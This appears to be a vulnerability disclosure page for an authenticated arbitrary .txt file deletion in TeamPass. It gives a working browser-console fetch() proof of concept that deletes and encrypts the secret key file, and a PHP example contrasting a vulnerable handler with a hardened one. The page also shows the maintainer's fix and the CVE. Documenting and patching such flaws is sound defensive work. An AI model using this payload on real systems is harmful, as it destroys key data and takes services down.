Arbitrary txt files deletion (authenticated) in nilsteampassnet/teampass

Status: Valid

Reported on Jan 21st 2023

Description

The file sources/export.queries.php can be exploited by any authenticated user to remove arbitrary .txt files. If the system administrator configured the base path of teampass-seckey.txt to be /var/teampass, as shown in the official example, the attacker can remove that key file and cause a total disruption of the application (every page then returns 500 Internal Server Error).

When the attack is executed the original .txt file is deleted and a new file with the same name but without the extension is created. The new file contains some HTML and the content of the original file encrypted with a password chosen by the attacker, so the original content cannot be recovered.

Proof of Concept

The following PoC assumes that the TeamPass SaltKey is stored at /var/teampass/teampass-seckey.txt.

Log in as any user (no special permission is required), open the browser console and execute the following JavaScript:

// Runs in the browser console of an authenticated TeamPass session.
fetch('http://localhost/teampass/sources/export.queries.php', {
    method: 'POST',
    credentials: 'include',                     // send the session cookie
    body: new URLSearchParams({
        type: 'export_to_html_format_finalize',
        file: '/var/teampass/teampass-seckey',  // ".txt" is appended server-side
        pdf_password: 'GoodbyeSecretKey'        // attacker-chosen encryption password
    }),
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
})
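The server-side pattern the request above exercises, beside a hardened handler, as an added example: this is not TeamPass's code and not the fix the maintainer shipped. The function names, the `$exportDir` parameter, the `.html` output name and the AES-256-GCM stand-in for the export encryption are assumptions made for illustration; the real handler is sources/export.queries.php.

```php
<?php
declare(strict_types=1);

// Added example, not TeamPass code. It reconstructs the file-handling pattern
// the description implies and contrasts it with a hardened handler. Function
// names, $exportDir and the encryption scheme are assumptions for illustration.

// Stand-in for "encrypt with the attacker-chosen password": PBKDF2 key
// derivation and AES-256-GCM. This is NOT TeamPass's export format.
function encrypt_for_export(string $plaintext, string $password): string
{
    $salt = random_bytes(16);
    $key  = hash_pbkdf2('sha256', $password, $salt, 100000, 32, true);
    $iv   = random_bytes(12);
    $tag  = '';
    $ct   = openssl_encrypt($plaintext, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
    if ($ct === false) {
        throw new RuntimeException('encryption failed');
    }
    return base64_encode($salt . $iv . $tag . $ct);
}

// Vulnerable pattern (reconstruction): the caller controls $file, the server
// appends ".txt", reads it, writes an HTML file with the encrypted content at
// $file and removes the original. file=/var/teampass/teampass-seckey therefore
// deletes the secret key file.
function finalize_export_vulnerable(string $file, string $password): string
{
    $txt  = $file . '.txt';
    $html = '<html><body><pre>' . htmlspecialchars(encrypt_for_export(file_get_contents($txt), $password)) . '</pre></body></html>';
    file_put_contents($file, $html);
    unlink($txt);
    return $file;
}

// Hardened version: the request may only name a file, not a path, and the
// resolved target must live inside the directory reserved for exports.
function finalize_export_hardened(string $file, string $password, string $exportDir): string
{
    // 1. Whitelist the name: no separators, no "..", no NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $file)) {
        throw new InvalidArgumentException('invalid export file name');
    }
    // 2. Resolve both sides with realpath() and check containment, which also
    //    rejects a symlink planted inside the export directory that points outside it.
    $base = realpath($exportDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('export directory not available');
    }
    $txt = realpath($base . DIRECTORY_SEPARATOR . $file . '.txt');
    if ($txt === false || strpos($txt, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('export file not found in export directory');
    }
    $out  = $base . DIRECTORY_SEPARATOR . $file . '.html';
    $html = '<html><body><pre>' . htmlspecialchars(encrypt_for_export(file_get_contents($txt), $password)) . '</pre></body></html>';
    file_put_contents($out, $html);
    unlink($txt);   // deleting the intermediate .txt is now confined to $base
    return $out;
}

// Demo on a scratch directory with constructed content (not real TeamPass files).
$exportDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tp-export-' . bin2hex(random_bytes(4));
mkdir($exportDir);
file_put_contents($exportDir . '/report.txt', "login;password\nalice;hunter2\n");

echo finalize_export_hardened('report', 'export-pw', $exportDir), PHP_EOL;

foreach (['/var/teampass/teampass-seckey', '../../../var/teampass/teampass-seckey', 'report/../x'] as $bad) {
    try {
        finalize_export_hardened($bad, 'GoodbyeSecretKey', $exportDir);
    } catch (InvalidArgumentException $e) {
        echo "rejected '$bad': ", $e->getMessage(), PHP_EOL;
    }
}
```

The vulnerable function is defined only to show the pattern and is never called in the demo. The two checks in the hardened version are deliberately redundant: the name whitelist stops traversal strings before any filesystem call, and the realpath() containment check catches anything the whitelist could not express, such as a symlink inside the export directory.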

Impact

This vulnerability can be used by an attacker with low privileges to remove arbitrary .txt files. It can lead to a total loss of availability if the path to teampass-seckey.txt is known.

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. 2 months ago
Sonia Zorba modified the report
2 months ago
Sonia Zorba (Researcher), 2 months ago:

@admin I'm trying to submit a similar one for version 2.1.27.36 (that looks to be the last Teampass 2 supported version). A pop-up opens complaining about "It looks like you're trying to report multiple occurrences of a vulnerability you've already disclosed" and forces me to edit this submission. The vulnerability that I was trying to submit is almost the same, but for version 2 it is more critical since it can also be performed by anonymous users and so has a higher CVSS score. Also the PoC is different. How should I proceed? Thanks

We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back 2 months ago
We have sent a follow up to the nilsteampassnet/teampass team. We will try again in 7 days. 2 months ago
nilsteampassnet (Maintainer), 2 months ago:

@admin I will fix the issue in branch 3. Branch 2 is not maintained anymore.

nilsteampassnet/teampass maintainer has acknowledged this report 2 months ago
nilsteampassnet (Maintainer), 2 months ago:

@zonia3000, Fix has been released in commit https://github.com/nilsteampassnet/TeamPass/commit/0af3574caba27a61b16dc25c94fa51ae12d2d967

nilsteampassnet validated this vulnerability a month ago
Sonia Zorba has been awarded the disclosure bounty
nilsteampassnet marked this as fixed in 3.0.0.22 with commit 0af357 a month ago
This vulnerability has been assigned a CVE
nilsteampassnet published this vulnerability a month ago
Sonia Zorba (Researcher), a month ago:

Thank you @nilsteampassnet!
